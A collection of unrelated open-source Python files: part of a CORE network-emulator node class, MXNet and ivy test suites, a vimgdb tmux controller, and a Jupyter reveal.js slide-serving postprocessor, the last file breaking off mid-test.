:param core.location.mobility.WirelessModel.cls model: wireless model to set to
:param dict config: configuration for model being set
:return: nothing
"""
logging.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS.value:
self.model = model(session=self.session, _id=self.id)
for netif in self.netifs():
netif.poshook = self.model.position_callback
if netif.poshook and netif.node:
x, y, z = netif.node.position.get()
netif.poshook(netif, x, y, z)
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY.value:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config):
if not self.mobility:
raise ValueError("no mobility set to update for node(%s)", self.id)
self.mobility.update_config(config)
def updatemodel(self, config):
if not self.model:
raise ValueError("no model set to update for node(%s)", self.id)
logging.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for netif in self.netifs():
if netif.poshook and netif.node:
x, y, z = netif.node.position.get()
netif.poshook(netif, x, y, z)
def all_link_data(self, flags):
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
:rtype: list[core.emulator.data.LinkData]
"""
all_links = CoreNetwork.all_link_data(self, flags)
if self.model:
all_links.extend(self.model.all_link_data(flags))
return all_links
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype = NodeTypes.TUNNEL.value
policy = "ACCEPT"
type = "tunnel"
|
test_gluon_model_zoo.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import setup_module, with_seed, teardown_module
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
@pytest.mark.parametrize('model_name', [
'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
pretrained_to_test = set(['mobilenetv2_0.25'])
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
|
appcontroller.py | import os
import sys
import re
import time
import json
import codecs
import os.path
import subprocess
import threading
from typing import Dict, List
from libtmux.pane import Pane
from libtmux.server import Server
from libtmux.window import Window
from vimgdb.base.common import Common
from vimgdb.base.controller import Controller, GdbMode
from vimgdb.controller.workspace import Workspace
from vimgdb.model.gdb import Gdb
from vimgdb.model.gdbserver import GdbServer
from vimgdb.model.cursor import Cursor
from vimgdb.model.breakpoint import Breakpoint
from vimgdb.view.win import Win
class AppController(Controller):
"""Main application class."""
def __init__(self, common: Common, args):
super().__init__(common, type(self).__name__)
self._scriptdir = os.path.dirname(os.path.abspath(__file__))
self._common = common
self.is_exit = False
self.workdir = os.getcwd()
self.file = ''
self.debug_bin = "t1"
self.tmux_server = None
self.tmux_session = None
self.tmux_pwin_idx = ''
self.tmux_window_vim = None
self.tmux_curr_pan_id = ''
self.tmux_pan_vim = None
self.tmux_pan_gdb = None
self.tmux_pan_gdbserver = None
self.tmux_sesname = ""
self.tmux_sesid = ""
self.tmux_win_def_width = 800
self.tmux_win_def_height = 600
self.layout_conf = {}
self.workSpace = None
self.workLayouts = {}
self.helper = {}
self.helper['worklayouts_loaded'] = False
self.ctx_gdb = None
self.ctx_gdbserver = None
self.cmd_gdb = ""
self.cmd_gdbserver = ''
self.curr_layout = ''
# self.breakpoint = Breakpoint(common)
# self.cursor = Cursor(common)
# self.win = Win(common, self.cursor)
def _wrap_async(self, func):
"""
Wraps `func` so that invocation of `func(args, kwargs)` happens
from the main thread. This is a requirement of pynvim API when
function call happens from other threads.
Related issue: https://github.com/numirias/semshi/issues/25
"""
def wrapper(*args, **kwargs):
return self.vim.async_call(func, *args, **kwargs)
return wrapper
def create_gdb_local(self, args):
modelGdb = Gdb(self._common,
self,
self.tmux_window_vim,
self.workSpace.get_pane(self.curr_layout, Common.tmux_pane_builtin_gdb),
self.debug_bin, self.gdb_output)
if not modelGdb:
return
self.models_coll[modelGdb._name] = modelGdb
# self.vim.command('let g:vimgdb_gdb = ' + modelGdb._name)
self.vim.vars['vimgdb_gdb'] = modelGdb._name
self.tmux_server._update_windows()
self.tmux_server._update_panes()
def create_gdb_remote(self, args):
modelGdbserver = GdbServer(self._common, self,
self.tmux_window_vim,
self.workSpace.get_pane(self.curr_layout, Common.tmux_pane_builtin_gdbserver),
self.debug_bin, self.gdbserver_output)
if not modelGdbserver:
return
self.models_coll[modelGdbserver._name] = modelGdbserver
# self.vim.command('let g:vimgdb_gdbserver = ' + modelGdbserver._name)
self.vim.vars['vimgdb_gdbserver'] = modelGdbserver._name
self.tmux_server._update_windows()
self.tmux_server._update_panes()
def _define_vimsigns(self):
# Define the sign for current line the debugged program is executing.
self.vim.call('sign_define', 'GdbCurrentLine',
{'text': self.vim.vars['vimgdb_sign_currentline'],
'texthl': self.vim.vars['vimgdb_sign_currentline_color']})
# Define signs for the breakpoints.
breaks = self.vim.vars['vimgdb_sign_breakpoints']
for i, brk in enumerate(breaks):
#sign define GdbBreakpointEn text=● texthl=Search
#sign define GdbBreakpointDis text=● texthl=Function
#sign define GdbBreakpointDel text=● texthl=Comment
self.vim.call('sign_define', f'GdbBreakpointEn{i+1}',
{'text': brk,
'texthl': self.vim.vars['vimgdb_sign_breakp_color_en']})
self.vim.call('sign_define', f'GdbBreakpointDis{i+1}',
{'text': brk,
'texthl': self.vim.vars['vimgdb_sign_breakp_color_dis']})
Common.vimsign_break_max += 1
def list_layout(self):
names = ''
for layoutname in self.workLayouts.keys():
names += layoutname + ', '
self.vim.command(f'echomsg "VimGdb layout: `{names}`"')
def load_layout_conf(self):
self.conf = self._scriptdir + "/../config/default.json"
if os.path.isfile(Common.vimgdb_conffile):
self.conf = Common.vimgdb_conffile
#self.logger.info(f"connect config={self.conf}")
with open(self.conf, 'r') as f:
content = f.read()
#decoded_data=content.encode().decode('utf-8-sig')
self.layout_conf = json.loads(content)
def build_workspace(self):
self.load_layout_conf()
tmux_builtin_panes = {}
self.helper[Common.tmux_builtin_panes] = tmux_builtin_panes
tmux_builtin_panes[Common.tmux_pane_builtin_main] = ''
tmux_builtin_panes[Common.tmux_pane_builtin_gdb] = Gdb.get_cmdstr(self._scriptdir, self.debug_bin)
# Avoid gdbserver start too ealier, waiting gdb done.
#tmux_builtin_panes[Common.tmux_pane_builtin_gdbserver] = GdbServer.get_cmdstr(self._scriptdir, self.debug_bin)
tmux_builtin_panes[Common.tmux_pane_builtin_gdbserver] = ''
self.workSpace = Workspace(self._common,
self.layout_conf,
self.helper[Common.tmux_builtin_panes],
self.workdir,
self.tmux_server, self.tmux_win_def_width, self.tmux_win_def_height)
self.build_set_current()
if self.gdbMode == GdbMode.LOCAL:
self.curr_layout = Common.tmux_layout_local
elif self.gdbMode == GdbMode.REMOTE:
self.curr_layout = Common.tmux_layout_remote
self.build_all_layout_codes()
self.build_layout(self.curr_layout)
def build_all_layout_codes(self):
if self.workLayouts and self.helper['worklayouts_loaded']:
self.logger.info(f"connect Existed and don't need create layout={self.workLayouts}")
return
self.helper['worklayouts_loaded'] = True
self.workLayouts.update(self.workSpace.build_all_layout_codes(Common.tmux_vimgdb_session_name))
self.logger.info(f"connect layout={self.workLayouts}")
def build_set_current(self):
# Tmux: reuse current tmux-window, but close all other panes in current window
# for only current vim is the controled vim instance.
# self.tmux_window_vim = self.tmux_session.new_window(
# attach=True, # do not move to the new window
# window_name="VimGdb",
# start_directory=self.workdir,
# window_index='', #
# window_shell='', #"vim " + self.file,
# )
self.tmux_window_vim = self.tmux_session.attached_window;
assert isinstance(self.tmux_window_vim, Window)
self.tmux_window_vim['window_name'] = self.curr_layout
self.tmux_pane_vim = self.tmux_window_vim.attached_pane
assert isinstance(self.tmux_pane_vim, Pane)
self.tmux_pane_vim['pane_name'] = Common.tmux_pane_builtin_main
def build_layout(self, layout: str):
self.logger.info(f"connect rebuild layout '{layout}'")
self.workSpace.build_one_layout(layout,
self.tmux_session,
self.tmux_window_vim,
self.tmux_pane_vim,
Common.tmux_pane_builtin_main)
def layout_select(self, layout: str):
if layout not in self.workLayouts:
self.vim.command(f'echomsg "VimGdb layout `{layout}` not exist, check VimGdbLayoutList()"')
return
# But can't create new pane
#self.tmux_window_vim.select_layout(self.workLayouts[layout]['layout'])
self.workSpace.build_one_layout(layout,
self.tmux_session,
self.tmux_window_vim,
self.tmux_pane_vim,
Common.tmux_pane_builtin_main)
def run(self, args):
os.system(f'touch {Common.vimgdb_debugfile}; truncate -s 0 {Common.vimgdb_debugfile}')
self.logger.info("==============================================")
self.logger.info("==============================================")
self.logger.info("==============================================")
self.logger.info("==============================================")
self.logger.info(" *** Gdb instance ***")
self.logger.info("")
self.logger.info("args=%s", args)
arg_n = len(args)
if arg_n < 2:
self.vim.command('echomsg "Gdb start fail, should: call VimGdb(\'local\', \'<bin-file>\')"')
return
os.system(f'touch {Common.gdb_output}; truncate -s 0 {Common.gdb_output}')
os.system(f'touch {Common.gdbserver_output}; truncate -s 0 {Common.gdbserver_output}')
os.system(f'touch {Common.vimqf_backtrace}; truncate -s 0 {Common.vimqf_backtrace}')
os.system(f'touch {Common.vimqf_breakpoint}; truncate -s 0 {Common.vimqf_breakpoint}')
os.system(f'touch {Common.gdb_tmp_break}; truncate -s 0 {Common.gdb_tmp_break}')
os.system(f'touch {Common.gdb_file_infolocal}; truncate -s 0 {Common.gdb_file_infolocal}')
self.gdbMode = args[0]
self.gdbArgs = args[1] # 't1 dut:8888 -u admin -p "" -t "gdb:trace"'
chunks = re.split(' +', self.gdbArgs)
if chunks:
self.debug_bin = chunks[0]
self.logger.info(f"Gdb starting '{self.debug_bin}' with {chunks[1:]} ...")
else:
self.debug_bin = self.gdbArgs
self.logger.info(f"Gdb starting '{self.debug_bin}' ...")
# let s:dir = expand('<sfile>:p:h')
self.vim.command('let g:vimgdb_file = expand("%:p")')
self.file = self.vim.eval('g:vimgdb_file')
if len(self.file) < 1:
self.vim.command('echomsg "Gdb start fail, no current file"')
return
tmux_info = subprocess.check_output(
['tmux', 'display-message', '-p', '#S;#{session_id};#{window_width};#{window_height};#{window_index};#{pane_id}'])
tmux_info = tmux_info.decode()
[self.tmux_sesname, self.tmux_sesid, self.tmux_win_def_width, self.tmux_win_def_height, self.tmux_pwin_idx, self.tmux_curr_pan_id] = tmux_info.strip().split(';')
# option controller: kill other pane of current tmux window
subprocess.check_output(['tmux', 'kill-pane', '-a', '-t', self.tmux_curr_pan_id])
self.logger.info(f"Tmux: #{self.tmux_sesid} '{self.tmux_sesname}' {self.tmux_win_def_width}x{self.tmux_win_def_height} cwd='{self.workdir}'")
self.tmux_server = Server()
self.tmux_session = self.tmux_server.get_by_id(self.tmux_sesid)
self.build_workspace()
self.vim.funcs.VimGdbInit()
self._define_vimsigns()
# Create model Cursor:
_model = Cursor(self._common, self)
if not _model:
return
self.models_coll[_model._name] = _model
# Create model Breakpoint:
_model = Breakpoint(self._common, self)
if not _model:
return
self.models_coll[_model._name] = _model
# Create view MainVimWin:
_view = Win(self._common, self)
if not _view:
return
self.views_coll[_view._name] = _view
self.logger.info(f"VimGdb mode={self.gdbMode}", )
if self.gdbMode == GdbMode.LOCAL or self.gdbMode == GdbMode.REMOTE:
self.create_gdb_local(args)
if self.gdbMode == GdbMode.REMOTE:
self.create_gdb_remote(args)
##self.tmux_window_vim.select_layout('main-horizontal')
#self.tmux_window_vim.select_layout('main-vertical')
# focus backto vim
self.tmux_pane_vim.select_pane()
# monitor all outfile
if Common.tailModeSubprocess:
self.logger.info("Start subprocess(tail -f) ...")
t1 = threading.Thread(target=self.tail_files)
#t1.setDaemon(True)
t1.start()
return
|
serve.py | """PostProcessor for serving reveal.js HTML slideshows."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import os
import webbrowser
import threading
from tornado import web, ioloop, httpserver, log, gen
from tornado.httpclient import AsyncHTTPClient
from traitlets import Bool, Unicode, Int
from .base import PostProcessorBase
class ProxyHandler(web.RequestHandler):
"""handler the proxies requests from a local prefix to a CDN"""
@gen.coroutine
def get(self, prefix, url):
"""proxy a request to a CDN"""
proxy_url = "/".join([self.settings['cdn'], url])
client = self.settings['client']
response = yield client.fetch(proxy_url)
for header in ["Content-Type", "Cache-Control", "Date", "Last-Modified", "Expires"]:
if header in response.headers:
self.set_header(header, response.headers[header])
self.finish(response.body)
class ServePostProcessor(PostProcessorBase):
"""Post processor designed to serve files
Proxies reveal.js requests to a CDN if no local reveal.js is present
"""
open_in_browser = Bool(True,
help="""Should the browser be opened automatically?"""
).tag(config=True)
browser = Unicode(u'',
help="""Specify what browser should be used to open slides. See
https://docs.python.org/3/library/webbrowser.html#webbrowser.register
to see how keys are mapped to browser executables. If
not specified, the default browser will be determined
by the `webbrowser`
standard library module, which allows setting of the BROWSER
environment variable to override it.
""").tag(config=True)
reveal_cdn = Unicode("https://cdnjs.cloudflare.com/ajax/libs/reveal.js/3.5.0",
help="""URL for reveal.js CDN.""").tag(config=True)
reveal_prefix = Unicode("reveal.js",
help="URL prefix for reveal.js").tag(config=True)
ip = Unicode("127.0.0.1",
help="The IP address to listen on.").tag(config=True)
port = Int(8000, help="port for the server to listen on.").tag(config=True)
def postprocess(self, input):
"""Serve the build directory with a webserver."""
dirname, filename = os.path.split(input)
handlers = [
(r"/(.+)", web.StaticFileHandler, {'path' : dirname}),
(r"/", web.RedirectHandler, {"url": "/%s" % filename})
]
if ('://' in self.reveal_prefix or self.reveal_prefix.startswith("//")):
# reveal specifically from CDN, nothing to do
pass
elif os.path.isdir(os.path.join(dirname, self.reveal_prefix)):
# reveal prefix exists
self.log.info("Serving local %s", self.reveal_prefix)
else:
self.log.info("Redirecting %s requests to %s", self.reveal_prefix, self.reveal_cdn)
handlers.insert(0, (r"/(%s)/(.*)" % self.reveal_prefix, ProxyHandler))
app = web.Application(handlers,
cdn=self.reveal_cdn,
client=AsyncHTTPClient(),
)
# hook up tornado logging to our logger
log.app_log = self.log
http_server = httpserver.HTTPServer(app)
http_server.listen(self.port, address=self.ip)
url = "http://%s:%i/%s" % (self.ip, self.port, filename)
print("Serving your slides at %s" % url)
print("Use Control-C to stop this server")
if self.open_in_browser:
try:
browser = webbrowser.get(self.browser or None)
b = lambda: browser.open(url, new=2)
threading.Thread(target=b).start()
except webbrowser.Error as e:
self.log.warning('No web browser found: %s.' % e)
browser = None
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print("\nInterrupted")
def main(path):
"""allow running this module to serve the slides"""
server = ServePostProcessor()
server(path)
if __name__ == '__main__':
import sys
main(sys.argv[1])
|
test_container.py | # global
import os
import queue
import pytest
import random
import numpy as np
import multiprocessing
import pickle
# local
import ivy
from ivy.container import Container
import ivy_tests.test_ivy.helpers as helpers
def test_container_list_join(device, call):
container_0 = Container(
{
"a": [ivy.array([1], device=device)],
"b": {
"c": [ivy.array([2], device=device)],
"d": [ivy.array([3], device=device)],
},
}
)
container_1 = Container(
{
"a": [ivy.array([4], device=device)],
"b": {
"c": [ivy.array([5], device=device)],
"d": [ivy.array([6], device=device)],
},
}
)
container_list_joined = ivy.Container.list_join([container_0, container_1])
assert np.allclose(ivy.to_numpy(container_list_joined["a"][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["c"][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["d"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined["a"][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["c"][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined["b"]["d"][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[1]), np.array([6]))
def test_container_list_stack(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_list_stacked = ivy.Container.list_stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_list_stacked["a"][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["c"][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["d"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked["a"][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["c"][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked["b"]["d"][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[1]), np.array([6]))
def test_container_unify(device, call):
# devices and containers
devices = list()
dev0 = device
devices.append(dev0)
conts = dict()
conts[dev0] = Container(
{
"a": ivy.array([1], device=dev0),
"b": {"c": ivy.array([2], device=dev0), "d": ivy.array([3], device=dev0)},
}
)
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = device[:-1] + str(idx)
devices.append(dev1)
conts[dev1] = Container(
{
"a": ivy.array([4], device=dev1),
"b": {
"c": ivy.array([5], device=dev1),
"d": ivy.array([6], device=dev1),
},
}
)
# test
container_unified = ivy.Container.unify(ivy.MultiDevItem(conts), dev0, "concat", 0)
assert np.allclose(ivy.to_numpy(container_unified.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[0]), np.array([3]))
if len(devices) > 1:
assert np.allclose(ivy.to_numpy(container_unified.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_unified.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_unified.b.d[1]), np.array([6]))
def test_container_concat(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_concatenated = ivy.concat([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_concatenated["a"]), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated.a), np.array([1, 4]))
assert np.allclose(ivy.to_numpy(container_concatenated["b"]["c"]), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.c), np.array([2, 5]))
assert np.allclose(ivy.to_numpy(container_concatenated["b"]["d"]), np.array([3, 6]))
assert np.allclose(ivy.to_numpy(container_concatenated.b.d), np.array([3, 6]))
def test_container_stack(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_stacked = ivy.Container.stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_stacked["a"]), np.array([[1], [4]]))
assert np.allclose(ivy.to_numpy(container_stacked.a), np.array([[1], [4]]))
assert np.allclose(ivy.to_numpy(container_stacked["b"]["c"]), np.array([[2], [5]]))
assert np.allclose(ivy.to_numpy(container_stacked.b.c), np.array([[2], [5]]))
assert np.allclose(ivy.to_numpy(container_stacked["b"]["d"]), np.array([[3], [6]]))
assert np.allclose(ivy.to_numpy(container_stacked.b.d), np.array([[3], [6]]))
def test_container_combine(device, call):
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container_comb = ivy.Container.combine(container_0, container_1)
assert np.equal(ivy.to_numpy(container_comb.a), np.array([4]))
assert np.equal(ivy.to_numpy(container_comb.b.c), np.array([5]))
assert np.equal(ivy.to_numpy(container_comb.b.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_comb.b.e), np.array([6]))
def test_container_diff(device, call):
# all different arrays
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([4]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_1), np.array([6]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different arrays
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" in container_diff_diff_only["b"]
assert "d" not in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" not in container_diff_same_only["b"]
assert "d" in container_diff_same_only["b"]
# all different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"e": ivy.array([1], device=device),
"f": {
"g": ivy.array([2], device=device),
"h": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"e": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" not in container_diff_diff_only["b"]
assert "d" in container_diff_diff_only["b"]
assert "e" in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" in container_diff_same_only["b"]
assert "d" not in container_diff_same_only["b"]
assert "e" not in container_diff_same_only["b"]
# same containers
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == {}
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == container_diff.to_dict()
# all different strings
container_0 = Container({"a": "1", "b": {"c": "2", "d": "3"}})
container_1 = Container({"a": "4", "b": {"c": "5", "d": "6"}})
container_diff = ivy.Container.diff(container_0, container_1)
assert container_diff.a.diff_0 == "1"
assert container_diff.a.diff_1 == "4"
assert container_diff.b.c.diff_0 == "2"
assert container_diff.b.c.diff_1 == "5"
assert container_diff.b.d.diff_0 == "3"
assert container_diff.b.d.diff_1 == "6"
container_diff_diff_only = ivy.Container.diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
def test_container_structural_diff(device, call):
# all different keys or shapes
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([[4]], device=device),
"b": {
"c": ivy.array([[[5]]], device=device),
"e": ivy.array([3], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.a.diff_1), np.array([[4]]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([[[5]]]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different shapes
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([[5]], device=device),
"d": ivy.array([6], device=device),
},
}
)
